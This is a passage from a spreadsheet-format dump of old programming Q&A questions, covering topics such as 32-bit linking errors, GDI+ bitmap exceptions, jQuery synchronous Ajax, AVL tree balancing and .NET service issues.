&lt;p&gt;Although I will never actually run on a 32-bit processor, I do need a 32-bit executable so I can link with some 32-bit libraries.&lt;/p&gt;
&lt;p&gt;My 2 questions are:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Why do I get a link error when I compile in 32-bit mode?&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Is there some way to get the program to compile and link, while still being able to link with a 32-bit library?&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>GDI+ System.Drawing.Bitmap gives error Parameter is not valid intermittently</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have some C# code in an ASP.Net application that does this:&lt;/p&gt;
&lt;p&gt;Bitmap bmp = new Bitmap(1184, 1900);&lt;/p&gt;
&lt;p&gt;And occasionally it throws an exception "Parameter is not valid". Now i've been googling around and apparently GDI+ is infamous for throwing random exceptions, and lots of people have had this problem, but nobody has a solution to it! I've checked the system and it has plenty of both RAM and swap space.
Now in the past if i do an 'iisreset' then the problem goes away, but it comes back in a few days. But i'm not convinced i've caused a memory leak, because as i say above there is plenty of ram+swap free.&lt;/p&gt;
&lt;p&gt;Anyone have any solutions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Data visualization in desktop applications</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to create data visualizations in desktop apps, using frameworks, languages and libraries that help with this kind of task. Visualizations should be interactive: clickable, draggable, customizable, animated...&lt;/p&gt;
&lt;p&gt;What I would like to create is something similar to the examples seen here: &lt;a href="http://www.visualcomplexity.com/vc/" rel="nofollow"&gt;http://www.visualcomplexity.com/vc/&lt;/a&gt; &lt;/p&gt;
&lt;p&gt;These are the links I already know: &lt;a href="http://delicious.com/laura_laura/visualization?setcount=100" rel="nofollow"&gt;http://delicious.com/laura_laura/visualization?setcount=100&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The preferred language is C++/Visual C++ (MFC) because I'm familiar with it, but any other technology is welcome, I would like to make a list from "as similar as possible" to Visual C++ to "very different" from Visual C++. &lt;/p&gt;
&lt;p&gt;WPF, flex, Adobe Air, flare, Javascript (running in a browser as client-side apps with access to local files or as desktop apps) are possibilities, post any good links to examples, tutorials, how-tos, etc. that you know of. &lt;/p&gt;
&lt;p&gt;What are the learning curves and complexity for the different options? Wich one would you choose and why? Wich one have you already worked with and how was your experience? How would you start with a project of this characteristics?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I provide custom error messages using JAXP DocumentBuilder?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to provide my own message from the validation done in &lt;code&gt;DocumentBuilder&lt;/code&gt;, rather than the one from &lt;code&gt;XMLMessages.properties&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Now I see that a property &lt;a href="http://apache.org/xml/properties/internal/error-reporter" rel="nofollow"&gt;&lt;code&gt;error-reporter&lt;/code&gt;&lt;/a&gt; needs to be set to a class which extends &lt;code&gt;XMLErrorReporter&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;However, I've not been able to get &lt;code&gt;ComponentManager&lt;/code&gt; from &lt;code&gt;Document&lt;/code&gt;/&lt;code&gt;Builder&lt;/code&gt;/&lt;code&gt;Factory&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Doing parsing of string in &lt;code&gt;SAXParseException&lt;/code&gt; is the last option, but I'm just thinking there may be a 'best practice' way of doing it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Migrations for Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I use both ruby on rails and Java.  I really enjoy using migrations when I am working on a rails project.  so I am wondering is there a migrations like tool for Java? If there is no such tool is it a good idea to use migrations as a tool to control a database used by a Java project? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Converting string to uint in actionscript / Flex</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am creating a component and want to expose a color property as many flex controls do, lets say I have simple component like this, lets call it foo_label:&lt;/p&gt;
&lt;pre&gt;
&lt;code&gt;
&amp;lt;mx:Canvas&gt;
    &amp;lt;mx:Script&gt;
        [Bindable] public var color:uint;
    &amp;lt;/mx:Script&gt;
    &amp;lt;mx:Label text="foobar" color="{color}" /&gt;
&amp;lt;/mx:Canvas&gt;
&lt;/code&gt;
&lt;/pre&gt;
&lt;p&gt;and then add the component in another mxml file, something along the lines of:&lt;/p&gt;
&lt;pre&gt;
&lt;code&gt;
&amp;lt;foo:foo_label color="red" /&gt;
&lt;/code&gt;
&lt;/pre&gt;
&lt;p&gt;When I compile the compiler complains: cannot parse value of type uint from text 'red'. However if I use a plain label I can do&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;mx:Label text="foobar" color="red"&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;without any problems, and the color property is still type uint. &lt;/p&gt;
&lt;p&gt;My question is how can I expose a public property so that I can control the color of my components text? Why can I use the string "red" as a uint field for the mx controls but cannot seem to do the same in a custom component, do I need to do something special?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to implement a singleton pattern class in Actionscript 3?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Since AS3 does not allow private constructors, it seems the only way to construct a singleton and guarantee the constructor isn't explicitly created via "new" is to pass a single parameter and check it.&lt;/p&gt;
&lt;p&gt;I've heard two recommendations, one is to check the caller and ensure it's the static getInstance(), and the other is to have a private/internal class in the same package namespace.&lt;/p&gt;
&lt;p&gt;The private object passed on the constructor seems preferable but it does not look like you can have a private class in the same package.  Is this true?  And more importantly is it the best way to implement a singleton?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Writing a cookie from an ASP.Net HTTPHandler - Page.Response object?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am creating an HTTP handler that listens for calls to a specific file type, and handles it accordingly.  My HTTP Handler listens for .bcn files, then writes a cookie to the user's computer and sends back an image... this will be used in advertising banners so that the user is tagged as seeing the banner, and we can then offer special deals when they visit our site later.&lt;/p&gt;
&lt;p&gt;The problem i'm having is getting access to the Page object... of course an HTTPHandler is not actually a page, and since the Response object lives within the Page object, I can't get access to it to write the cookie.&lt;/p&gt;
&lt;p&gt;Is there a way around this, or do i need to revert back to just using a standard aspx page to do this?&lt;/p&gt;
&lt;p&gt;Thanks heaps.. 
Greg&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it expected that all the units of a Project Group in Delphi 7 to be in one folder?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Maybe this applied to other Delphi's (I've only used 7).  We've got our code broken up so that nearly every DLL in our fairly massive app is in a different folder. &lt;p&gt;
99% of the open source stuff I've downloaded to plug into Delphi have had all their source munged into one folder. &lt;p&gt;
It seems like this was an assumption that the developers of Delphi made about the coding practices of it's users that may be non-obvious.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I create an installer for a .Net website, Windows Service, and more?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to create an installer program that will do install the following:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;ASP.Net Website &lt;/li&gt;
&lt;li&gt;Windows Service&lt;/li&gt;
&lt;li&gt;SQL Express if it isn't installed
and the user doesn't have a SQL
Server&lt;/li&gt;
&lt;li&gt;Dundas Charts&lt;/li&gt;
&lt;li&gt;ASP.Net AJAX v.1.0&lt;/li&gt;
&lt;li&gt;ReportViewer control (for 2.0 Framework)&lt;/li&gt;
&lt;li&gt;Check Framework prerequisites (2.0)&lt;/li&gt;
&lt;li&gt;Configure IIS and app.config (data connection strings, etc.)&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Is it realistic to be able to do this with a VS Setup Project?  Or, should I be looking at other install tools?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I programmatically manipulate Windows desktop icon locations?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Several years back, I innocently tried to write a little app to save my tactically placed desktop icons because I was sick of dragging them back to their locations when some event reset them.  I gave up after buring WAY too much time having failed to find a way to query, much less save and reset, my icons' desktop position.&lt;/p&gt;
&lt;p&gt;Anyone know where Windows persists this info and if there's an API to set them?&lt;/p&gt;
&lt;p&gt;Thanks,
Richard&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JSP pagination without retrieving the whole result set?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to display the log entries from a database.
Of course the log data is huge, so I have to show the results on several pages, and that **without** getting **all** the log data at once, but as the user navigates through the pages.&lt;/p&gt;
&lt;p&gt;I know about &lt;a href="http://displaytag.sourceforge.net/11/" rel="nofollow"&gt;DisplayTag&lt;/a&gt; and &lt;a href="http://code.google.com/p/tabletags/" rel="nofollow"&gt;TableTags&lt;/a&gt;, but it seems to me that they both fetch all the data before applying pagination.&lt;/p&gt;
&lt;p&gt;Before I start developing my own JSP tag, does anyone know of a 3rd party solution for this problem?&lt;/p&gt;
&lt;p&gt;Thanks,&lt;br&gt;Marius&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Recommendations for a good C#/ .NET based lexical analyser</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anyone recommend a good .NET based lexical analyser, preferably written in C#?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Deployment of custom content type, forms, cqwp, and xsl</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Right now I have a visual studio project which contains a custom content type that I made. It also contains all the necessary files for making a sharepoint solution (wsp) file and a script to generate this. &lt;/p&gt;
&lt;p&gt;Now, I would like to do 2 things. &lt;/p&gt;
&lt;p&gt;First, I'd like to create a custom display form for the content type and include it in my solution so that it is automatically deployed when I deploy my solution. How do I include this in my solution and make my content type use it?&lt;/p&gt;
&lt;p&gt;Secondly, you can query this type with the CQWP. I've thought about exporting it, adding more common view fields, and then modifying the XSL that is used to render it. How do I include this into my solution so that it is also deployed. I know i can export the CQWP webpart once it's all setup and include it in my project as a feature. But what abuot the XSL?&lt;/p&gt;
&lt;p&gt;Looking forward to see your suggestions, cheers.&lt;/p&gt;
&lt;p&gt;Did as described in the first answer. Worked like a charm.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>image archive VS image strip</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i've noticed that plenty of games / applications (very common on mobile builds) pack numerous images into an image strip. 
I figured that the advantages in this are making the program more tidy (file system - wise) and reducing (un)installation time. During the runtime of the application, the entire image strip is allocated and copied from FS to RAM.
On the contrary, images can be stored in an image archive and unpacked during runtime to a number of image structures in RAM.&lt;/p&gt;
&lt;p&gt;The way I see it, the image strip approach is less efficient because of worse caching performance and because that even if the optimal rectangle packing algorithm is used, there will be empty spaces between the stored images in the strip, causing a waste of RAM.&lt;/p&gt;
&lt;p&gt;What are the advantages in using an image strip over using an image archive file?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I check that I removed required data only?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a really big database (running on PostgreSQL) containing a lot of tables with sophisticated relations between them (foreign keys, on delete cascade and so on).
I need remove some data from a number of tables, but I'm not sure what amount of data will be really deleted from database due to cascade removals.&lt;/p&gt;
&lt;p&gt;How can I check that I'll not delete data that should not be deleted?&lt;/p&gt;
&lt;p&gt;I have a test database - just a copy of real one where I can do what I want :)&lt;/p&gt;
&lt;p&gt;The only idea I have is dump database before and after and check it. But it not looks comfortable.
Another idea - dump part of database, that, as I think, should not be affected by my DELETE statements and check this part before and after data removal. But I see no simple ways to do it (there are hundreds of tables and removal should work with ~10 of them). Is there some way to do it?&lt;/p&gt;
&lt;p&gt;Any other ideas how to solve the problem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Distributed Processing: C++ equivalent of JTA</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm developing a mission-critical solution where data integrity is paramount and performance a close second. If data gets stuffed up, it's gonna be cata$trophic.&lt;/p&gt;
&lt;p&gt;So, I'm looking for the C/C++ version of JTA (Java Transaction API). Does anyone know of any C or C++ libraries that supports distributed transactions? And yes, I've googled it ... unsuccessfully.&lt;/p&gt;
&lt;p&gt;I'd hate to be told that there isn't one and I'd need to implement the protocol specified by &lt;a href="http://www.opengroup.org/pubs/catalog/c193.htm" rel="nofollow"&gt;Distributed TP: The XA Specification&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Please help!&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Edit (responding to kervin): If I need to insert records across multiple database servers and I need to commit them atomically, products like Oracle will have solutions for it. If I've written my own message queue server and I want to commit messages to multiple servers atomically, I'll need something like JTA to make sure that I don't stuff up the atomicity of the transaction.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>fatal error C1900: Il mismatch between 'P1' version '20060201' and 'P2' version '20050411'</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I compile my project with VIsual Studio 2005 Express Edition, and get this linking error. Can anyone suggest how to solve that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are there any tips/tricks about using Subsonic with Asp.Net MVC Framework?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there anyone using Subsonic with asp.net mvc framework? If so, can you tell us something about your experience. Are there tips and tricks that can be shared?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>maximum size for xml files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;whats your rule of thumb for maximum size for xml files.&lt;/p&gt;
&lt;p&gt;What if I ask maximum no of records, and one record have 10 values for instance? Another condition is we are loading it from web.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Passing timestamp parameters in SQLAnalyzer to debug stored procedures</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi I'm trying to debug a stored procedure through SQL Analyzer and one of the parameters is a timestamp datatype. If I wanted to pass 0x00000001410039E2 through as a parameter how would i do this? When I pass 0x00000001410039E2 I get a string truncation error and when I pass just 1410039E2 I get 0x1410039E20000000?&lt;/p&gt;
&lt;p&gt;Edit: @Frans Yes this works but my issue is that in SQLAnalyzer when i right-click and debug when I enter the value in the value textbox I get the error message:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[Microsoft][ODBC SQL Server Driver]String data, right truncation
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Is Java the best language for Mobile App Devlopment?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was wondering what are the benefits of using anything else but Java for Mobile Application Development.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can a web service return a stream?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been writing a little application that will let people upload &amp;amp; download files to me.  I've added a web service to this applciation to provide the upload/download functionality that way but I'm not too sure on how well my implementation is going to cope with large files.&lt;/p&gt;
&lt;p&gt;At the moment the definitions of the upload &amp;amp; download methods look like this (written using Apache CXF):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;boolean uploadFile(@WebParam(name = "username") String username,
    @WebParam(name = "password") String password,
    @WebParam(name = "filename") String filename,
    @WebParam(name = "fileContents") byte[] fileContents)
    throws UploadException, LoginException;
byte[] downloadFile(@WebParam(name = "username") String username,
    @WebParam(name = "password") String password,
    @WebParam(name = "filename") String filename) throws DownloadException,
    LoginException;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So the file gets uploaded and downloaded as a byte array.  But if I have a file of some stupid size (e.g. 1GB) surely this will try and put all that information into memory and crash my service.&lt;/p&gt;
&lt;p&gt;So my question is - is it possible to return some kind of stream instead?  I would imagine this isn't going to be terribly OS independent though.  Although I know the theory behind web services, the practical side is something that I still need to pick up a bit of information on.&lt;/p&gt;
&lt;p&gt;Cheers for any input,
Lee&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you retrieve a list of logged-in/connected users in .NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here's the scenario:&lt;/p&gt;
&lt;p&gt;You have a Windows server that users remotely connect to via RDP. You want your program (which runs as a service) to know who is currently connected. This may or may not include an interactive console session.&lt;/p&gt;
&lt;p&gt;Please note that this is the &lt;strong&gt;not&lt;/strong&gt; the same as just retrieving the current interactive user.&lt;/p&gt;
&lt;p&gt;I'm guessing that there is some sort of API access to Terminal Services to get this info?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Method 'XYZ' cannot be reflected</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have consumed a third party web service and are trying to invoke it from an ASP.NET web application.
However when I instantiate the web service the following System.InvalidOperationException  exception is thrown:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Method 'ABC.XYZ' can not be reflected.
  System.InvalidOperationException:
  Method 'ABC.XYZ' can not be reflected.
  ---&gt; System.InvalidOperationException: The XML element 'MyDoc' from namespace
  '&lt;a href="http://mysoftware.com/ns"&gt;http://mysoftware.com/ns&lt;/a&gt;' references
  a method and a type. Change the
  method's message name using
  WebMethodAttribute or change the
  type's root element using the
  XmlRootAttribute.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;From what I can gather there appears to be some ambiguity between a method and a type in the web service.
Can anyone clarify the probably cause of this exception and is there anything I can do to rectify this or should I just go to the web service owners to rectify?&lt;/p&gt;
&lt;p&gt;Edit: Visual Studio 2008 has created the proxy class. Unfortunately I can't provide a link to the wsdl as it is a web service for a locally installed thrid party app.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>jQuery - running a function on a new image</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm a jQuery novice, so the answer to this may be quite simple:&lt;/p&gt;
&lt;p&gt;I have an image, and I would like to do several things with it.
When a user clicks on a 'Zoom' icon, I'm running the 'imagetool' plugin (&lt;a href="http://code.google.com/p/jquery-imagetool/" rel="nofollow"&gt;http://code.google.com/p/jquery-imagetool/&lt;/a&gt;) to load a larger version of the image. The plugin creates a new div around the image and allows the user to pan around.&lt;/p&gt;
&lt;p&gt;When a user clicks on an alternative image, I'm removing the old one and loading in the new one.&lt;/p&gt;
&lt;p&gt;The problem comes when a user clicks an alternative image, and then clicks on the zoom button - the imagetool plugin creates the new div, but the image appears after it...&lt;/p&gt;
&lt;p&gt;The code is as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Product Zoom (jQuery)
$(document).ready(function(){
$("#productZoom").click(function() {
	// Set new image src
	var imageSrc = $("#productZoom").attr("href");
	$("#productImage").attr('src', imageSrc);	
	// Run the imagetool plugin on the image
	$(function() {
		$("#productImage").imagetool({
			viewportWidth: 300,
			viewportHeight: 300,
			topX: 150,
			topY: 150,
			bottomX: 450,
			bottomY: 450
		});
	});
	return false;
});
});
// Alternative product photos (jQuery)
$(document).ready(function(){
$(".altPhoto").click(function() {
	$('#productImageDiv div.viewport').remove();
	$('#productImage').remove();
	// Set new image src
	var altImageSrc = $(this).attr("href");
	$("#productZoom").attr('href', altImageSrc);
	var img = new Image();
    $(img).load(function () {
		$(this).hide();
        $('#productImageDiv').append(this);
        $(this).fadeIn();
    }).error(function () {
        // notify the user that the image could not be loaded
    }).attr({
		src: altImageSrc,
		id: "productImage"
		});
	return false;		
});
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It seems to me, that the imagetool plugin can no longer see the #productImage image once it has been replaced with a new image... So I think this has something to do with binding? As in because the new image is added to the dom after the page has loaded, the iamgetool plugin can no longer use it correctly... is this right?
If so, any ideas how to deal with it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Deterministic dispose of ThreadStatic objects</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The &lt;a href="http://stackoverflow.com/questions/9033?#13932"&gt;ThreadStatic attribute&lt;/a&gt; declares a static variable as unique-per-thread.
Do you know an easy pattern to correctly dispose such variables?&lt;/p&gt;
&lt;p&gt;What we used before ThreadStatic is a ThreadContextManager. Every thread was allocated a ThreadContext which retained all thread-specific information. We spawned some threads and let them work. Then, when they all finished, we disposed of the ThreadContentManager, which in turn disposed all the contexts if they were IDisposable.&lt;/p&gt;
&lt;p&gt;I don't see an immediate way to translate this pattern to ThreadStatic objects. The objects will be disposed of eventualy, because the threads die, and so nothing reference them. However, we prefer deterministic dispose whenever possible.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I do not really control the threads directly - I'm using Microsoft CCR, which has a ThreadPool that does tasks. When all the tasks are done, I'm disposing the Dispatcher (which holds the threadpool). The thing is - I do not get a chance to do anything "at the end of a thread's main function" - so I can't dispose things manually at the end of a thread's run. Can I access the thread's static objects from outside the thread somehow?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I add an action to visio (2003)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a visio shapesheet one can add actions. I want to create an action that updates the value of another cell (the position of a control). How can one do that. Does it need a separate macro, or can it be specified directly? And how?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does Castle Windsor hold onto transient objects?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Recently I noticed my application appears to be eating memory that never gets released. After profiling with CLRProfiler I've found that the Castle Windsor container I'm using is holding onto objects. These objects are declared with the lifestyle="transient" attribute in the config xml.&lt;/p&gt;
&lt;p&gt;I've found if I put an explicit call to &lt;code&gt;IWindsorContainer.Release(hangingObject)&lt;/code&gt;, that it will drop its references.&lt;/p&gt;
&lt;p&gt;This is causing a problem though, I wasn't expecting that with a transient lifestyle object CastleWindsor would keep a reference and effectively create a leak. It's going to be a rather mundane and error prone task going around inserting explicit Release calls in all the appropriate places.&lt;/p&gt;
&lt;p&gt;Have you seen this problem, and do you have any suggestions for how to get around it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Illustrating usage of the volatile keyword in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to code a little program which visually illustrates the behavior of the &lt;code&gt;volatile&lt;/code&gt; keyword. Ideally, it should be a program which performs concurrent access to a non volatile static field and which gets incorrect behavior because of that. &lt;/p&gt;
&lt;p&gt;Adding the volatile keyword in the same program should fix the problem.&lt;/p&gt;
&lt;p&gt;That something I didn't manage to achieve. Even trying several times, enabling optimization, etc., I always get a correct behavior without the 'volatile' keyword.&lt;/p&gt;
&lt;p&gt;Do you have any idea about this topic? Do you know how to simulate such a problem in a simple demo app? Does it depend on hardware?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I get jQuery to perform a synchronous, rather than asynchronous, Ajax request?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a JavaScript widget which provides standard extension points. One of them is the &lt;code&gt;beforecreate&lt;/code&gt; function. It should return &lt;code&gt;false&lt;/code&gt; to prevent an item from being created. &lt;/p&gt;
&lt;p&gt;I've added an Ajax call into this function using jQuery:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;beforecreate: function (node, targetNode, type, to) {
  jQuery.get('http://example.com/catalog/create/' + targetNode.id + '?name=' + encode(to.inp[0].value),
  function (result) {
    if (result.isOk == false) 
        alert(result.message);
  });
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I want to prevent my widget from creating the item, so I should return &lt;code&gt;false&lt;/code&gt; in the mother-function, not in the callback. Is there a way to perform a synchronized Ajax request using jQuery or any other API?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In Perforce, can you rename a folder to the same name but cased differently?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can I rename a folder in Perforce from &lt;em&gt;//depot/FooBar/&lt;/em&gt; to &lt;em&gt;//depot/Foobar/&lt;/em&gt;?&lt;/p&gt;
&lt;p&gt;I've tried this by renaming from &lt;em&gt;//depot/FooBar/&lt;/em&gt; to &lt;em&gt;//depot/Temp/&lt;/em&gt; to &lt;em&gt;//Depot/Foobar/&lt;/em&gt; but the end result ends up the same as &lt;em&gt;//depot/FooBar/&lt;/em&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Programatically delete emails and SMSs on a Window Mobile device</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a code snippet that can delete all emails and text messages on a Windows Mobile device. Preferably the code would delete items in the Sent and Drafts folders as well as the Inbox. &lt;/p&gt;
&lt;p&gt;My platform is Windows Mobile (5.0 SDK) and .net 2.0 compact framework (C# / VB.NET)&lt;/p&gt;
&lt;p&gt;Many thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the difference between a "Data Service Layer" and a "Data Access Layer"?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I remember reading that one abstracts the low level calls into a data agnostic framework (eg. ExecuteCommand methods etc), and the other usually contains business specific methods (eg. UpdateCustomer).&lt;/p&gt;
&lt;p&gt;Is this correct?  Which is which?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Configure db used for ASP.Net Authentication</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to use forms authentication in my asp.net mvc site.&lt;/p&gt;
&lt;p&gt;Can I use an already existing sql db (on a remote server) for it? How do I configure the site to use this db for authentication? Which tables do I need/are used for authentication?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you handle small sets of data?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;With really small sets of data, the policy where I work is generally to stick them into text files, but in my experience this can be a development headache. Data generally comes from the database and when it doesn't, the process involved in setting it/storing it is generally hidden in the code. With the database you can generally see all the data available to you and the ways with which it relates to other data.&lt;/p&gt;
&lt;p&gt;Sometimes for really small sets of data I just store them in an internal data structure in the code (like A Perl hash) but then when a change is needed, it's in the hands of a developer. &lt;/p&gt;
&lt;p&gt;So how do you handle small sets of infrequently changed data? Do you have set criteria of when to use a database table or a text file or..? &lt;/p&gt;
&lt;p&gt;I'm tempted to just use a database table for absolutely everything but I'm not sure if there are any implications to this.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; For context:&lt;/p&gt;
&lt;p&gt;I've been asked to put a new contact form on the website for a handful of companies, with more to be added occasionally in the future. Except, companies don't have contact email addresses.. the users inside these companies do (as they post jobs through their own accounts). Now though, we want a "speculative application" type functionality and the form needs an email address to send these applications to. But we also don't want to put an email address as a property in the form or else spammers can just use it as an open email gateway. So clearly, we need an ID -&gt; contact_email type relationship with companies.  &lt;/p&gt;
&lt;p&gt;SO, I can either add a column to a table with millions of rows which will be used, literally, about 20 times OR create a new table that at most is going to hold about 20 rows. Typically how we handle this in the past is just to create a nasty text file and read it from there. But this creates maintenance nightmares and these text files are frequently looked over when data that they depend on changes. Perhaps this is a fault with the process, but I'm just interested in hearing views on this.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>propertyNameFieldSpecified when generating a 2.0 web service proxy from a WCF Service</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have created a web reference (Add Web Reference) from Visual Studio 2008 and strangely, I need to set the &lt;em&gt;propertyNameField&lt;/em&gt;Specified to true for all the fields I want to submit. Failure to do that and values are not passed back to the WCF Service. &lt;/p&gt;
&lt;p&gt;I have read at several places that this was fixed in the RTM version of Visual Studio. Why does it still occurring?&lt;/p&gt;
&lt;p&gt;My data contracts are all valid with nothing else than properties and lists. Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Balancing a Binary Tree (AVL)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ok, this is another one in the theory realm for the CS guys around.&lt;/p&gt;
&lt;p&gt;In the 90's I did fairly well in implementing BST's. The only thing I could never get my head around was the intricacy of the algorithm to balance a Binary Tree (AVL).&lt;/p&gt;
&lt;p&gt;Can you guys help me on this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I access a mapped network drive with System.IO.DirectoryInfo?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to create a directory on a mapped network drive. I am using a code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DirectoryInfo targetDirectory = new DirectoryInfo(path);
if (targetDirectory != null)
{
    targetDirectory.Create();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I specify the path like "\\\\ServerName\\Directory", it all goes OK. If I map the "\\ServerName\Directory" as, say drive Z:, and specify the path like "Z:\\", it fails.&lt;/p&gt;
&lt;p&gt;After the creating the targetDirectory object, VS shows (in the debug mode) that targetDirectory.Exists = false, and trying to do targetDirectory.Create() throws an exception:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;System.IO.DirectoryNotFoundException: "Could not find a part of the path 'Z:\'."
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, the same code works well with local directories, e.g. C:.&lt;/p&gt;
&lt;p&gt;The application is a Windows service (WinXP Pro, SP2, .NET 2) running under the same account as the user that mapped the drive. Qwinsta replies that the user's session is the session 0, so it is the same session as the service's.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>spawn a new xterm window</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I am using Bitvise Tunnelier and I spawn a new xterm window connecting to our sun station everything works nicely. We have visual slick edit installed on the sun station and I have been instructed to open it using the command vs&amp;amp;. When I do this I get the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;fbm240-1:/home/users/ajahn 1 % vs&amp;amp;
[1] 4716
fbm240-1:/home/users/ajahn 2 % Visual SlickEdit: Can't open connection to X. DIS
PLAY='&amp;lt;Default Display&amp;gt;'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would rather not go jumping through hoops ftping my material back and forth to the server.
Advice?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.NET - How to hide invalid choices in a DateTimePicker</t>
  </si>
  <si>
